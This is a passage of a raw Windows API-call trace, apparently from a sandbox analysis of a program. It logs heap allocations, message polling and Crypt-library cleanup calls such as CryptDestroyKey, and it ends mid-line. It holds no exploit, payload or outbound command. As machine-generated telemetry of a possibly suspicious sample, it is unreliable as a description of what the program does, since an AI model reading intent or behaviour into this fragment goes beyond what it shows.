0x2e50f38 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0245.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.956] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0245.956] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0245.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0245.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.957] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0245.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0245.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0245.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0245.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0245.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0245.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51160, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0245.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0245.958] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0245.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0245.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0245.958] CryptDestroyKey (hKey=0xa86f50) returned 1 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0245.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0245.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0245.959] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0245.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0245.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0245.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.960] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.960] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0245.960] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ed8 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ed8 | out: hHeap=0x970000) returned 1 [0245.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0245.960] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0245.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0245.962] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.962] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0245.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0245.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f48 [0245.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.962] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f48 | out: hHeap=0x970000) returned 1 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0245.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0245.962] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0245.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0245.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0245.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0245.963] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0245.963] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.963] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0245.963] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0245.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0245.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 